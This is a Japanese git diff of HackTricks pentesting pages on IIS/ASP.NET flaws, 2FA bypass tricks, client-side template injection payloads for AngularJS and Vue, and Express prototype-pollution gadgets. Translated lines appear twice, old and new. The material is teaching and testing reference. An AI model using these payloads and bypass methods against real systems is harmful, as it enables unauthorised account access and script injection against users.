この情報には、リモートクライアントのIP、セッションID、すべてのリクエストとレスポンスのクッキー、物理パス、ソースコード情報、そして潜在的にユーザー名とパスワードさえ含まれる可能性があります。
この情報には、リモートクライアントのIP、セッションID、すべてのリクエストとレスポンスのクッキー、物理パス、ソースコード情報、そして潜在的にユーザー名とパスワードさえ含まれる可能性があります。
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
@ -246,12 +259,12 @@ ASPXAUTHは以下の情報を使用します
* **`decryptionIV`**文字列16進数エンコードされた初期化ベクトルゼロのベクトルがデフォルト
* **`decryptionKey`**文字列復号に使用する16進数エンコードされたキー。
ただし、これらのパラメータの**デフォルト値**を使用し、**ユーザーのメールをクッキーとして使用**する人もいます。したがって、攻撃対象のサーバーで**ユーザーのメールを持つユーザーを作成**し、ASPXAUTHクッキーを第二のサーバーから第一のサーバーに使用してユーザーを偽装することができるかもしれません。\
ただし、これらのパラメータの**デフォルト値**を使用し、**ユーザーのメールをクッキーとして使用**する人もいます。したがって、攻撃対象のサーバーで**希望のユーザーのメールを持つユーザーを作成**し、ASPXAUTHクッキーを**第二のサーバーから第一のサーバーに使用**してユーザーを偽装することができるかもしれません。\
この攻撃はこの[**解説**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19)で成功しました。
## キャッシュされたパスワードを使用したIIS認証バイパスCVE-2022-30209 <a href="#3-iis-authentication-bypass" id="3-iis-authentication-bypass"></a>
## キャッシュされたパスワードを使用したIIS認証バイパスCVE-2022-30209 <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[完全なレポートはこちら](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html):コードのバグが、ユーザーが提供したパスワードを適切にチェックしなかったため、**パスワードハッシュがすでにキャッシュにあるキーに一致する**攻撃者はそのユーザーとしてログインできるようになります。
[完全なレポートはこちら](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html):コードのバグが、ユーザーが提供したパスワードを**適切にチェックしなかった**ため、**パスワードハッシュがすでにキャッシュにあるキーに一致する**攻撃者はそのユーザーとしてログインできるようになります。
```python
# script for sanity check
> type test.py
@ -271,16 +284,28 @@ HTTP/1.1 401 Unauthorized
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローしてください**。**
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **をチェックしてください!**
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローする。**
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
</details>

86
pentesting-web/2fa-bypass.md
View file

@ -1,40 +1,54 @@
# 2FA/OTP Bypass
# 2FA/OTP バイパス
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を使って、ゼロからヒーローまでAWSハッキングを学びましょう</summary>
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)を入手する
* \*\*💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック
* [**公式PEASSHackTricksッズ**](https://peass.creator-spring.com)を入手
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)を入手
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦**@carlospolopm** をフォローする [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **ハッキングテクニックを共有するために、** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、無料でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## **強化された二要素認証バイパステクニック**
### **直接エンドポイントアクセス**
2FAをバイパスするために、パスを知っていることが重要なため、直接次のエンドポイントにアクセスします。失敗した場合は、**Referrerヘッダー**を変更して、2FA確認ページからのナビゲーションを模倣します。
2FAをバイパスするために、パスを知っている場合は、直接次のエンドポイントにアクセスします。失敗した場合は、**Referrerヘッダー**を変更して、2FA確認ページからのナビゲーションを模倣します。
### **トークンの再利用**
以前に使用したトークンを再利用してアカウント内で認証することが効果的です。
アカウント内で以前に使用したトークンを再利用することは効果的です。
### **未使用トークンの利用**
自分のアカウントからトークンを抽出して、別のアカウントで2FAをバイパスする試みができます。
自分のアカウントからトークンを抽出して、別のアカウントで2FAをバイパスしようとすることができます。
### **トークンの露出**
Webアプリケーションからの応答でトークンが開示されているかどうかを調査します。
Webアプリケーションからのレスポンスでトークンが公開されていないか調査します。
### **検証リンクの悪用**
アカウント作成時に送信された**メール検証リンク**を使用すると、2FAなしでプロファイルにアクセスできる場合があります。詳細は[ポスト](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b)で説明されています
アカウント作成時に送信された**メール検証リンク**を使用すると、2FAなしでプロファイルにアクセスできる場合があります。詳細は[こちら](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b)。
### **セッション操作**
@ -42,11 +56,11 @@ Webアプリケーションからの応答でトークンが開示されてい
### **パスワードリセットメカニズム**
パスワードリセット機能を調査し、同じリンクを使用して複数のリセットを許可する可能性があるかどうかを確認します。新しくリセットされた資格情報でログインすることで、2FAをバイパスできるかもしれません。
パスワードリセット機能を調査し、リセット後にユーザーをアプリケーションにログインさせる潜在的な能力を確認することが重要です。新しくリセットされた資格情報でログインすることで、2FAをバイパスできるかもしれません。
### **OAuthプラットフォームの侵害**
信頼された**OAuth**プラットフォームGoogle、Facebookでユーザーアカウントを侵害することで、2FAをバイパスする経路が提供される可能性があります。
信頼された**OAuth**プラットフォームGoogle、Facebookでユーザーアカウントを侵害することで、2FAをバイパスできる可能性があります。
### **ブルートフォース攻撃**
@ -56,11 +70,11 @@ Webアプリケーションからの応答でトークンが開示されてい
#### **遅いブルートフォース**
全体的なレート制限が存在する場合でも、遅いブルートフォース攻撃が有効です。
全体的なレート制限が存在しない場合、遅いブルートフォース攻撃が有効です。
#### **コード再送信リミットリセット**
#### **コード再送信制限のリセット**
コードを再送信すると、レート制限がリセットされ、継続的なブルートフォース試行が容易になります。
コードを再送信すると、レート制限がリセットされ、継続的なブルートフォース試行が可能になります。
#### **クライアントサイドのレート制限回避**
@ -70,17 +84,17 @@ Webアプリケーションからの応答でトークンが開示されてい
ログイン試行を保護するレート制限があるかもしれませんが、内部アカウントアクションにはレート制限がない場合があります。
#### **SMSコード再送信コスト**
#### **SMSコード再送信コスト**
SMS経由でコードを過剰に再送信すると、企業にコストがかかりますが、2FAをバイパスすることはできません。
#### **無限OTP再生成**
簡単なコードで無限のOTP生成が可能であり、少数のコードを繰り返し試行することでブルートフォースが可能です。
簡単なコードを使って無限のOTP生成を行うことで、少数のコードを繰り返し試行することでブルートフォースが可能になります。
### **レースコンディションの悪用**
2FAバイパスのためのレースコンディションの悪用は、特定の文書に見つかる可能性があります。
2FAバイパスのためのレースコンディションの悪用は、特定の文書に記載されています。
### **CSRF/Clickjackingの脆弱性**
@ -90,11 +104,11 @@ SMS経由でコードを過剰に再送信すると、企業にコストがか
#### **予測可能なCookie値**
"remember me" cookie値を推測することで制限をバイパスできる可能性があります。
"Remember me"クッキーの値を推測することで制限をバイパスできます。
#### **IPアドレスなりすまし**
**X-Forwarded-For**ヘッダーを介して被害者のIPアドレスをなりすますことで制限をバイパスできる可能性があります。
**X-Forwarded-For**ヘッダーを通じて被害者のIPアドレスをなりすますことで制限をバイパスできます。
### **古いバージョンの利用**
@ -104,7 +118,7 @@ SMS経由でコードを過剰に再送信すると、企業にコストがか
#### **APIエンドポイント**
/v\*ディレクトリパスで示される古いAPIバージョンは、2FAバイパス法に脆弱である可能性があります。
/v\*ディレクトリパスで示される古いAPIバージョンは、2FAバイパス法に脆弱である可能性があります。
### **以前のセッションの処理**
@ -112,35 +126,21 @@ SMS経由でコードを過剰に再送信すると、企業にコストがか
### **バックアップコードのアクセス制御の欠陥**
2FAの有効化時にバックアップコードを即座に生成し、潜在的な不正な取得を行うことは、CORSの誤構成/XSSの脆弱性を特に考慮するとリスクがあります。
2FAの有効化時にバックアップコードを即座に生成し、潜在的な未承認のバックアップコードの取得、特にCORSの誤構成/XSSの脆弱性がリスクをもたらす可能性があります。
### **2FAページでの情報開示**
### **2FAページでの情報漏洩**
2FA確認ページでの機密情報開示(電話番号など)は懸念事項です。
2FA確認ページでの機密情報漏洩(電話番号など)は懸念事項です。
### **パスワードリセットによる2FAの無効化**
アカウント作成、2FAの有効化、パスワードリセット、および2FA要件なしでの後続ログインを含む潜在的なバイパス方法を示すプロセスがあります。
アカウント作成、2FAの有効化、パスワードリセット、および2FA要件なしでのサブセクエントログインを含むプロセスは、潜在的なバイパス手法を示しています。
### **デコイリクエスト**
デコイリクエストを利用してブルートフォース試行を曖昧にしたり、レート制限メカニズムを誤誘導したりすることで、バイパス戦略に別のレイヤーを追加できます。このようなリクエストを作成するには、アプリケーションのセキュリティ対策とレート制限の動作について繊細な理解が必要です。
デコイリクエストを使用してブルートフォース試行を曖昧にしたり、レート制限メカニズムを誤認させたりすることで、バイパス戦略に別のレイヤーを追加できます。このようなリクエストを作成するには、アプリケーションのセキュリティ対策とレート制限の動作に対する微妙な理解が必要です。
## 参考文献
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/jp/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)を入手する
* \*\*💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
</details>

62
pentesting-web/client-side-template-injection-csti.md
View file

@ -1,29 +1,42 @@
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
HackTricks をサポートする他の方法:
HackTricksをサポートする他の方法:
* **HackTricks で企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
* **ハッキングトリックを共有するためにPRを提出して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリに。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
# 概要
これは**サーバーサイドテンプレートインジェクション**ssti-server-side-template-injection/)のようですが、**クライアント**側で行われます。**SSTI**はリモートサーバーで**コードを実行**することを可能にする一方、**CSTI**は被害者のブラウザで**任意のJavaScriptコードを実行**することができます。
これは**サーバーサイドテンプレートインジェクション**SSTIのようなものですが、**クライアント**側にあります。**SSTI**はリモートサーバーでコードを実行できる可能性がありますが、**CSTI**は被害者のブラウザで**任意のJavaScriptコードを実行**できる可能性があります。
この脆弱性の**テスト**は、**SSTI**の場合と非常に**類似**しています。インタプリタは**テンプレート**を期待し、それを実行します。たとえば、`{{ 7-7 }}`のようなペイロードを使用すると、アプリが**脆弱**であれば`0`が表示され、そうでなければ元の`{{ 7-7 }}`が表示されます。
# AngularJS
AngularJSは広く使用されているJavaScriptフレームワークで、**`ng-app`**などのディレクティブとして知られる属性を介してHTMLとやり取りします。このディレクティブにより、AngularJSはHTMLコンテンツを処理し、二重中括弧内でJavaScript式を実行できるようにします。
AngularJSは広く使用されているJavaScriptフレームワークで、**`ng-app`**などのディレクティブとして知られる属性を介してHTMLとやり取りします。このディレクティブにより、AngularJSはHTMLコンテンツを処理し、二重中括弧内のJavaScript式を実行できるようになります。
ユーザー入力が`ng-app`でタグ付けされたHTML本文に動的に挿入されるシナリオでは、任意のJavaScriptコードを実行することが可能です。これは、入力内でAngularJSの構文を活用することで実現できます。以下に、JavaScriptコードを実行する方法を示す例があります
ユーザー入力が`ng-app`でタグ付けされたHTML本文に動的に挿入されるシナリオでは、任意のJavaScriptコードを実行することが可能です。これは、入力内でAngularJSの構文を活用することで実現できます。以下は、JavaScriptコードを実行する方法を示す例です:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
@ -35,12 +48,12 @@ AngularJSは広く使用されているJavaScriptフレームワークで、**`n
非常**基本的なオンライン例**は、[http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)で**AngularJS**の脆弱性を見つけることができます。また、**[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**でも確認できます。
{% hint style="danger" %}
[**Angular 1.6はサンドボックスを削除しました**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.)。そのため、このバージョンから、`{{constructor.constructor('alert(1)')()}}``<input ng-focus=$event.view.alert('XSS')>`などのペイロードが機能するはずです。
[**Angular 1.6はサンドボックスを削除しました**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.)ので、このバージョンから`{{constructor.constructor('alert(1)')()}}``<input ng-focus=$event.view.alert('XSS')>`ようなペイロードが機能するはずです。
{% endhint %}
# VueJS
[https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)に**脆弱なVue**の実装があります。\
**脆弱なVue**の実装は、[https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)で見つけることができます。\
動作するペイロード: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
また、脆弱な例の**ソースコード**はこちらにあります: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
@ -54,9 +67,9 @@ VUEにおけるCSTIに関する非常に良い投稿は、[https://portswigger.n
```
{{_openBlock.constructor('alert(1)')()}}
```
Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
## **V2**
信用:[Gareth Heyes、Lewis ArdernPwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
```
{{constructor.constructor('alert(1)')()}}
```
@ -86,17 +99,28 @@ javascript:alert(1)%252f%252f..%252fcss-images
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローする。**
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
</details>

61
pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
View file

@ -9,18 +9,32 @@ HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
- **ハッキングトリックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する**
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で**フォロー**する。
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## Serve XSS responses
**詳細については、[元のリサーチを参照してください](https://portswigger.net/research/server-side-prototype-pollution)**
### JSONコンテンツタイプをHTMLに変更
**JSONコンテンツタイプのレスポンス**を使用し、JSONを反映しているExpressアプリ内で
**JSONコンテンツタイプのレスポンス**を使用し、JSONを反映るExpressアプリ内で
```javascript
app.use(bodyParser.json({type: 'application/json'}));
app.post('/', function(req, res){
@ -28,11 +42,11 @@ _.merge({}, req.body);
res.send(req.body);
});
```
これらのケースでは、JSONコンテンツタイプでは通常XSSは可能ではありません。ただし、プロトタイプ汚染を使用すると、**Expressを混乱させてHTMLレスポンスを提供させることができます。** この脆弱性は、アプリケーションが**`res.send(obj)`**を使用し、application/jsonコンテンツタイプでボディパーサーを使用していることに依存しています。
これらのケースでは、JSONコンテンツタイプでは通常XSSは起こりません。ただし、プロトタイプ汚染を利用すると、**Expressを混乱させてHTMLレスポンスを提供させることができます。** この脆弱性は、アプリケーションが**`res.send(obj)`**を使用し、application/jsonコンテンツタイプでボディパーサーを使用していることに依存しています。
```json
{"__proto__":{"_body":true,"body":"<script>evil()"}}
```
**`body`**および**`_body`**プロパティを**汚染**することで、**ExpressがHTMLコンテンツタイプを提供**し、_bodyプロパティを反映させ、保存されたXSSが発生する可能性があります。
**`body`****`_body`**プロパティを**汚染**することで、**ExpressがHTMLコンテンツタイプを提供**し、_bodyプロパティを反映させ、保存されたXSSが発生する可能性があります。
### UTF7のレンダリング
@ -54,7 +68,7 @@ Expressが**UTF-7コンテンツをレンダリングする**ことが可能で
```
### 公開されたヘッダー
次のPPガジェットにより、サーバーはHTTPヘッダーを送信します: **`Access-Control-Expose_headers: foo`**
次のPPガジェットは、サーバーがHTTPヘッダー**`Access-Control-Expose_headers: foo`**を送信するようにします。
```json
{"__proto__":{"exposedHeaders":["foo"]}}
```
@ -62,7 +76,7 @@ Expressが**UTF-7コンテンツをレンダリングする**ことが可能で
### **OPTIONSメソッド**
次のペイロードを使用すると、**OPTIONSレスポンスからメソッドを隠す**ことが可能です:
次のペイロードを使用すると、**OPTIONSレスポンスからメソッドを隠す**ことができます:
```javascript
// Original reponse: POST,GET,HEAD
@ -84,13 +98,13 @@ Expressが**UTF-7コンテンツをレンダリングする**ことが可能で
({}).__proto__.__proto__={}//throws type exception
({}).__proto__.__proto__="x"//no-op does not throw exception
```
### 反された値
### 反された値
アプリケーションがレスポンスにオブジェクトを含める場合、**`__proto__`一緒に異常な名前の属性を作成**すると興味深いです。特に、レスポンスに**異常な属性だけが返される**場合、これはアプリケーションの脆弱性を示している可能性があります:
アプリケーションがレスポンスにオブジェクトを含める場合、**`__proto__`並んで異常な名前の属性を作成**すると興味深いです。特に、**レスポンスに異常な属性だけが返される**場合、これはアプリケーションの脆弱性を示している可能性があります:
```json
{"unusualName":"value","__proto__":"test"}
```
また、Lodashのようなライブラリが使用されているシナリオでは、プロトタイプ汚染PPを介してプロパティを設定することと、オブジェクト内で直接設定することの両方が別の診断アプローチを提供します。応答からそのようなプロパティが省略されている場合、Lodashはマージする前に対象オブジェクト内のプロパティの存在を検証していることを示唆しています:
さらに、Lodashのようなライブラリが使用されているシナリオでは、プロトタイプ汚染PPを介してプロパティを設定し、オブジェクト内で直接設定することで、別の診断アプローチが提供されます。応答からそのようなプロパティが省略されている場合、Lodashがマージする前に対象オブジェクト内のプロパティの存在を検証していることを示唆しています:
```javascript
{"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
// If 'b' is the only property reflected, this indicates prototype pollution in Lodash
@ -99,27 +113,40 @@ Expressが**UTF-7コンテンツをレンダリングする**ことが可能で
### ドットを許可
Expressには、**クエリ文字列パラメータからオブジェクトを作成する**オプションがあります。\
Expressには、**クエリ文字列パラメータからオブジェクトを作成**するオプションがあります。\
これは、**プロトタイプ汚染の脆弱性を悪用する**ためのバグ**チェーン**で利用できます。
```json
{"__proto__":{"allowDots":true}}
```
**`?foo.bar=baz`はNodeでオブジェクトを作成します。**
## 参考文献
## 参
